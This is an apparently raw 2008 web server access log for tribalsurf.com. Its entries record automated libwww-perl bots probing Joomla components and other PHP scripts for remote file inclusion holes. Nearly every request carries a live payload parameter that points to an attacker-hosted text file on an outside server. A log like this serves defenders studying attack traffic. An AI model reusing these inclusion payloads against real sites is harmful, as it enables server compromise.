77.221.130.5 - - [31/Aug/2008:18:59:36 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:18:59:36 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:18:59:47 -0700] "GET /logs/access_080707.log//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:18:59:48 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:18:59:48 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:19:00:48 -0700] "GET /logs/access.log//includes/get_header.php?vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:19:00:48 -0700] "GET //includes/get_header.php?vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:19:00:48 -0700] "GET /logs//includes/get_header.php?vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:01:14 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:01:14 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:01:14 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:01:28 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:01:28 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:01:28 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:02:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:19:02:35 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:19:02:36 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
85.17.6.7 - - [31/Aug/2008:19:02:36 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:19:04:35 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:19:04:36 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:19:04:36 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:05:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:05:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:07:38 -0700] "GET /logs/access.log/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:07:38 -0700] "GET /home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:07:38 -0700] "GET /logs/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:07:40 -0700] "GET /logs/access.log%20//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
66.135.39.118 - - [31/Aug/2008:19:08:46 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "tribalsurf.com"
66.135.39.118 - - [31/Aug/2008:19:08:48 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "tribalsurf.com"
66.135.39.118 - - [31/Aug/2008:19:08:50 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:09:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:09:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:09:59 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:09:59 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:10:00 -0700] "GET //include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:10:00 -0700] "GET //include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:10:00 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:19:10:01 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:10:56 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:10:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:10:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:11:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:48 -0700] "GET /logs/access.log/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:48 -0700] "GET /logs/access.log/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:48 -0700] "GET /logs/access.log/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:48 -0700] "GET /home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:48 -0700] "GET /home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:48 -0700] "GET /home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:49 -0700] "GET /logs/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:49 -0700] "GET /logs/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
217.70.32.7 - - [31/Aug/2008:19:11:49 -0700] "GET /logs/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:12:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:12:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:14:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:14:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:14:46 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:14:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:14:59 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
202.181.105.117 - - [31/Aug/2008:19:14:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:19:16:56 -0700] "GET /logs/access.log%20/index.php?conteudo=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:19:16:56 -0700] "GET /logs/index.php?conteudo=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:19:16:56 -0700] "GET /index.php?conteudo=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:27:36 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:27:37 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:27:37 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:19:27:53 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:19:28:07 -0700] "GET /principal.php?conteudo=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:19:28:07 -0700] "GET /logs/access_080707.log/principal.php?conteudo=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:19:32:24 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:19:32:25 -0700] "GET //include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:19:32:25 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:19:32:57 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:19:32:57 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:19:32:57 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:33:46 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "tribalsurf.com"
77.221.130.5 - - [31/Aug/2008:19:33:46 -0700] "GET //include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "tribalsurf.com"
82.194.70.164 - - [31/Aug/2008:19:34:34 -0700] "GET /logs/access.log//principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
82.194.70.164 - - [31/Aug/2008:19:34:35 -0700] "GET //principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
82.194.70.164 - - [31/Aug/2008:19:34:35 -0700] "GET /logs//principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.214.71.29 - - [31/Aug/2008:19:36:44 -0700] "GET /logs/access.log//principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
82.194.70.164 - - [31/Aug/2008:19:36:45 -0700] "GET /logs/access.log//principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.214.71.29 - - [31/Aug/2008:19:36:45 -0700] "GET //principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
82.194.70.164 - - [31/Aug/2008:19:36:45 -0700] "GET //principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.214.71.29 - - [31/Aug/2008:19:36:45 -0700] "GET /logs//principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
82.194.70.164 - - [31/Aug/2008:19:36:46 -0700] "GET /logs//principal.php?conteudo=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:19:40:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:19:40:50 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:19:40:50 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
72.52.166.232 - - [31/Aug/2008:19:41:26 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:19:44:21 -0700] "GET /logs/access.log//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:19:44:22 -0700] "GET //include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:19:44:22 -0700] "GET /logs//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:19:44:24 -0700] "GET /logs/access_080707.log/index2.php?x=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:19:44:25 -0700] "GET /index2.php?x=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:19:44:25 -0700] "GET /logs/index2.php?x=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:19:44:36 -0700] "GET /logs/access_080714.log/index2.php?x=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
202.57.163.125 - - [31/Aug/2008:19:44:44 -0700] "GET ///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:19:47:48 -0700] "GET /logs/access.log//components/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:19:47:49 -0700] "GET //components/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:19:47:49 -0700] "GET /logs//components/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:47:50 -0700] "GET /logs/access.log//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:47:50 -0700] "GET //errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:47:50 -0700] "GET /logs//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:50:29 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:50:29 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:19:50:29 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
74.53.196.210 - - [31/Aug/2008:19:51:40 -0700] "GET /logs/access.log/scanhttp://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
74.53.196.210 - - [31/Aug/2008:19:51:40 -0700] "GET /scanhttp://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
74.53.196.210 - - [31/Aug/2008:19:51:40 -0700] "GET /logs/scanhttp://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
190.41.11.250 - - [31/Aug/2008:19:52:37 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
190.41.11.250 - - [31/Aug/2008:19:52:37 -0700] "GET //?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 1331 "-" "libwww-perl/5.805" "www.tribalsurf.com"
190.41.11.250 - - [31/Aug/2008:19:52:38 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.805" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:20:01:37 -0700] "GET /logs/index2.php?x=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:20:01:37 -0700] "GET /logs/access_080707.log/index2.php?x=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:20:01:37 -0700] "GET /index2.php?x=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:20:01:37 -0700] "GET /logs/access_080714.log/index2.php?x=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:03:15 -0700] "GET /logs/access_080707.log//include/bbs.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:03:15 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:03:15 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:20:03:34 -0700] "GET /logs/access.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:20:03:34 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
